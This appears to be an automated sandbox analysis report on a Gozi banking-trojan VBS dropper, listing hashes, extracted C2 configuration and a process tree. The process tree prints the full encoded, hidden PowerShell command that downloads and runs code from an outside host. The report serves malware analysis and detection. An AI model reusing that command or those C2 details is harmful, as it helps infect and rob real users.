gozi | e7e9df4507c4491b0d533fbfcca44579f7fad5db87f7b10f8cbbfc31b6679bfc

General

Target

8ad4fd0c0b88ab0d825bcd3d5bea86232dbebbf41f0b3b8de78d5c77eb2de9c6.vbs
Size

22KB
MD5

3dd859f7aa6f95b80aae2c7c4b5eaaf9
SHA1

3ef2f7246e9dee40ca9b6a7ecc0b5c7568367e80
SHA256

8ad4fd0c0b88ab0d825bcd3d5bea86232dbebbf41f0b3b8de78d5c77eb2de9c6
SHA512

9552049edd58c22dac6f081c110eaebbcc23f0c28e3544c8387da5a1be376fbf0b7c777a95bc1277c5246f8588be7632fd9f335d428bdc58864c870d04d9f994
SSDEEP

384:GOjk+QtGIKg7ETp2FHIKIGZVgXFpmcMYqYaGmPUVdE/MMMWm4qVuAL:I9eYjTT//0MjgVuAL

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://communicalink.com/index.php

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

C2

mifrutty.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

5 2728 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

WiGCo.exe

pid process

2872 WiGCo.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

2728 powershell.exe
2728 powershell.exe
2728 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2728 powershell.exe

flow	pid	process
5	2728	powershell.exe

pid	process
2872	WiGCo.exe

pid	process
2728	powershell.exe
2728	powershell.exe
2728	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2728	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

WScript.execmd.exepowershell.exe

description	pid	process	target process
PID 2708 wrote to memory of 2632	2708	WScript.exe	cmd.exe
PID 2708 wrote to memory of 2632	2708	WScript.exe	cmd.exe
PID 2708 wrote to memory of 2632	2708	WScript.exe	cmd.exe
PID 2632 wrote to memory of 2728	2632	cmd.exe	powershell.exe
PID 2632 wrote to memory of 2728	2632	cmd.exe	powershell.exe
PID 2632 wrote to memory of 2728	2632	cmd.exe	powershell.exe
PID 2728 wrote to memory of 2872	2728	powershell.exe	WiGCo.exe
PID 2728 wrote to memory of 2872	2728	powershell.exe	WiGCo.exe
PID 2728 wrote to memory of 2872	2728	powershell.exe	WiGCo.exe
PID 2728 wrote to memory of 2872	2728	powershell.exe	WiGCo.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8ad4fd0c0b88ab0d825bcd3d5bea86232dbebbf41f0b3b8de78d5c77eb2de9c6.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2708

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
2⤵
- Suspicious use of WriteProcessMemory
PID:2632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2728

C:\Users\Admin\AppData\Local\Temp\WiGCo.exe
"C:\Users\Admin\AppData\Local\Temp\WiGCo.exe"
4⤵
- Executes dropped EXE
PID:2872

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\WiGCo.exe

Filesize
274KB

MD5
d18f3fecf6d28ddd0f4cf4a9b53c0aec

SHA1
05263b9ec69fcf48cc71443ba23545fabe21df12

SHA256
911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4

SHA512
4629ce7f35716bd2c0fc3c14104251c6b2f3eaf07f7b35cf181654d6bc9be85bda6cb6f802b00f98c6bbb446db4790940605dcf8f8d6391282281ac029ff0512

Download Submit
C:\Users\Admin\AppData\Local\Temp\WiGCo.exe

Filesize
274KB

MD5
d18f3fecf6d28ddd0f4cf4a9b53c0aec

SHA1
05263b9ec69fcf48cc71443ba23545fabe21df12

SHA256
911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4

SHA512
4629ce7f35716bd2c0fc3c14104251c6b2f3eaf07f7b35cf181654d6bc9be85bda6cb6f802b00f98c6bbb446db4790940605dcf8f8d6391282281ac029ff0512

Download Submit
memory/2728-8-0x0000000002590000-0x0000000002610000-memory.dmp

Filesize
512KB

Download
memory/2728-6-0x00000000022B0000-0x00000000022B8000-memory.dmp

Filesize
32KB

Download
memory/2728-4-0x000000001B3B0000-0x000000001B692000-memory.dmp

Filesize
2.9MB

Download
memory/2728-9-0x0000000002590000-0x0000000002610000-memory.dmp

Filesize
512KB

Download
memory/2728-10-0x0000000002590000-0x0000000002610000-memory.dmp

Filesize
512KB

Download
memory/2728-11-0x0000000002590000-0x0000000002610000-memory.dmp

Filesize
512KB

Download
memory/2728-5-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmp

Filesize
9.6MB

Download
memory/2728-7-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmp

Filesize
9.6MB

Download
memory/2728-19-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmp

Filesize
9.6MB

Download
memory/2872-21-0x0000000002380000-0x0000000002480000-memory.dmp

Filesize
1024KB

Download
memory/2872-22-0x0000000000400000-0x000000000228B000-memory.dmp

Filesize
30.5MB

Download
memory/2872-23-0x0000000000220000-0x000000000022B000-memory.dmp

Filesize
44KB

Download
memory/2872-24-0x0000000000280000-0x000000000028D000-memory.dmp

Filesize
52KB

Download
memory/2872-27-0x0000000002380000-0x0000000002480000-memory.dmp

Filesize
1024KB

Download
memory/2872-28-0x0000000000400000-0x000000000228B000-memory.dmp

Filesize
30.5MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads